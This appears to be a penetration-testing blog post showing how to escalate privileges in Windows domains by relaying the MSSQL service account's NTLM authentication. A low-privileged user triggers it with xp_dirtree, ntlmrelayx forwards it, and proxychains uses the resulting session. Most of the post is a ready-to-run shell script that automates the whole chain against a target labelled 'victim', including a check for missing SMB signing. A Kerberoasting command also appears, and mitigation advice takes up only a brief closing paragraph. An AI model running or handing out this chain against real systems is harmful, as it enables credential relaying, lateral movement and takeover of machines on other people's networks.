NTLM relaying is a classic lateral-movement technique in Windows penetration tests. One reliable way to trigger an NTLM authentication you can relay is Microsoft SQL Server: if you hold any domain account that can log in to an MSSQL instance, the `xp_dirtree` extended stored procedure will make the SQL Server service account connect to a UNC path of your choosing, and that connection carries the service account's NTLM authentication. This turns into privilege escalation when the service account holds high privileges (typically local administrator) on other computers, and it works against any such computer that does not require SMB signing.
Steps to Perform NTLM Relaying:
- Start `ntlmrelayx` with the `-socks` option, pointing it at the computer where the SQL service account is privileged (not at the SQL Server itself):
ntlmrelayx.py -t smb://target_ip -socks -smb2support
- Connect to the MSSQL instance with `mssqlclient.py` using the low-privileged domain credentials, then call `xp_dirtree` with a UNC path to the host where `ntlmrelayx` is listening:
mssqlclient.py domain/user:password@mssql_server_ip -windows-auth
Then, in the SQL shell, execute:
EXEC xp_dirtree '\\your_smb_server\share', 1, 1;
The share does not need to exist. The service account's NTLM authentication is captured and relayed to the target, and `ntlmrelayx` keeps the resulting SMB session open behind its SOCKS listener (127.0.0.1:1080 by default).
- Point `proxychains` at that SOCKS port and use the relayed session as the high-privileged account. No password is supplied, because the session is already authenticated:
proxychains smbclient.py domain/service_account@target_ip -no-pass
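The three steps above wired into one script, together with the SMB-signing pre-check a practitioner runs before bothering with the relay. This is an added example, not code from the original post or from the Impacket project. The hosts (10.10.14.5, 10.10.10.20, 10.10.10.30), the `CORP` domain, the `lowpriv` and `sqlsvc` accounts, the share name and the password are hypothetical placeholders; it assumes Impacket's scripts, `proxychains`, `nmap` and `ss` are on the PATH and that `/etc/proxychains.conf` contains `socks4 127.0.0.1 1080`. Step 1 (`ntlmrelayx.py`) is left to the operator in a second terminal because it runs an interactive prompt; the script refuses to continue until that SOCKS listener is up.

```shell
#!/bin/sh
# Added example (not from the original post): MSSQL xp_dirtree -> ntlmrelayx -socks -> proxychains.
# Every host, domain, account, share and password here is a hypothetical placeholder;
# override any of them through the environment before running with DO_RELAY=1.
set -eu

ATTACKER_IP="${ATTACKER_IP:-10.10.14.5}"      # host where ntlmrelayx listens for SMB
SHARE="${SHARE:-relay}"                       # share name in the UNC path; it need not exist
MSSQL_HOST="${MSSQL_HOST:-10.10.10.20}"       # SQL Server a low-privileged domain user can reach
RELAY_TARGET="${RELAY_TARGET:-10.10.10.30}"   # machine where the SQL service account is an admin
DOMAIN="${DOMAIN:-CORP}"
LOW_USER="${LOW_USER:-lowpriv}"
LOW_PASS="${LOW_PASS:-Passw0rd}"
SVC_USER="${SVC_USER:-sqlsvc}"                # account SQL Server runs as; this is who gets relayed
SOCKS_PORT="${SOCKS_PORT:-1080}"              # ntlmrelayx -socks default listener

# Build the UNC path handed to xp_dirtree. The leading double backslash is what makes
# SQL Server treat the argument as a remote share and authenticate to it as its own
# service account; that NTLM exchange is what ntlmrelayx captures and forwards.
unc_path() {  # unc_path <host> <share>
    printf '\\\\%s\\%s' "$1" "$2"
}

# T-SQL that triggers the outbound authentication. Depth 1 / include-files 1 keeps the
# listing cheap; the directory never has to exist, only the SMB negotiation matters.
xp_dirtree_sql() {  # xp_dirtree_sql <host> <share>
    printf "EXEC master..xp_dirtree '%s', 1, 1;" "$(unc_path "$1" "$2")"
}

# Relaying to SMB only works when the target does not *require* signing (the workstation
# default of "enabled but not required" is still relayable). Feed this function the
# output of:  nmap -p445 --script smb2-security-mode <target>
# Returns 0 when relayable, 1 when signing is required, 2 when the output is inconclusive.
smb_relayable() {
    out=$(cat)
    case "$out" in
        *"Message signing enabled and required"*) return 1 ;;
        *"Message signing enabled but not required"*|*"Message signing disabled"*) return 0 ;;
        *) return 2 ;;
    esac
}

# True when something (expected: ntlmrelayx -socks) is listening on the SOCKS port.
relay_listening() {
    ss -ltn 2>/dev/null | grep -q ":${SOCKS_PORT} "
}

run_relay() {
    for t in ntlmrelayx.py mssqlclient.py smbclient.py proxychains nmap ss; do
        command -v "$t" >/dev/null 2>&1 || { echo "missing tool: $t" >&2; exit 1; }
    done
    # /etc/proxychains.conf is assumed to contain the line:  socks4 127.0.0.1 1080

    if ! nmap -p445 --script smb2-security-mode "$RELAY_TARGET" | smb_relayable; then
        echo "$RELAY_TARGET requires SMB signing or gave no answer; relay will not work" >&2
        exit 1
    fi

    # Step 1 runs in a second terminal because ntlmrelayx -socks opens an interactive prompt:
    #   ntlmrelayx.py -t smb://$RELAY_TARGET -socks -smb2support
    if ! relay_listening; then
        echo "start ntlmrelayx.py -t smb://$RELAY_TARGET -socks -smb2support first" >&2
        exit 1
    fi

    # Step 2: make the SQL Server service account connect to our listener.
    sql_file=$(mktemp)
    xp_dirtree_sql "$ATTACKER_IP" "$SHARE" >"$sql_file"
    mssqlclient.py "$DOMAIN/$LOW_USER:$LOW_PASS@$MSSQL_HOST" -windows-auth -file "$sql_file"
    rm -f "$sql_file"

    # Step 3: use the relayed session through the SOCKS proxy. -no-pass, because
    # ntlmrelayx already holds the authenticated SMB connection as the service account.
    proxychains smbclient.py "$DOMAIN/$SVC_USER@$RELAY_TARGET" -no-pass
}

# Nothing touches the network unless explicitly asked, so the helpers can be tested offline.
if [ "${DO_RELAY:-0}" = "1" ]; then
    run_relay
fi
```

Run it as `DO_RELAY=1 ATTACKER_IP=<your ip> RELAY_TARGET=<victim> ./relay.sh` after `ntlmrelayx.py` is up in another terminal. The `smb_relayable` check is the part worth keeping even if you drive the rest by hand: a target that answers "Message signing enabled and required" will reject the relayed session, and the whole chain silently fails at step 3 without it.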
Additional Commands and Tools:
- Impacket Tools: Impacket is a collection of Python classes for working with network protocols. It includes tools like `ntlmrelayx`, `smbclient`, and `mssqlclient`.
- Proxychains: A tool that forces any TCP connection made by a given application to go through a proxy, here the SOCKS listener that `ntlmrelayx` opens for the relayed session.
- Kerberos Attacks: Impacket also covers Kerberos. `GetUserSPNs.py` with `-request` asks the domain controller for service tickets for every account that has an SPN (Kerberoasting), so their encrypted tickets can be cracked offline. This is a separate technique from relaying, but it needs only the same low-privileged domain credentials.
GetUserSPNs.py domain/user:password -dc-ip domain_controller_ip -request
What Undercode Say:
NTLM relaying is a critical technique in penetration testing, especially in Windows environments. It lets an attacker move laterally by abusing two weak configurations at once: an MSSQL service account that holds privileges on other machines, and SMB targets that accept unsigned traffic. Tools like `ntlmrelayx`, `mssqlclient`, and `proxychains` make the chain straightforward to execute. To mitigate it, require SMB signing on servers and workstations (signing that is merely enabled but not required does not stop relaying), and run SQL Server under an account that has no privileges on other hosts.
In addition to NTLM relaying, Kerberos-based attacks such as Kerberoasting and "Pass the Ticket" are also prevalent. Tools from the Impacket suite can perform these attacks, but they are often detectable by modern security solutions, so attackers may use obfuscation techniques to evade detection.
For further reading on NTLM relaying and related techniques, consider the following resources:
– Impacket GitHub Repository
– Microsoft Documentation on SMB Security
– Kerberos Attacks Explained
By understanding and practicing these techniques, you can better secure your network against such attacks. Always ensure that your systems are configured securely, and regularly test your defenses to stay ahead of potential threats.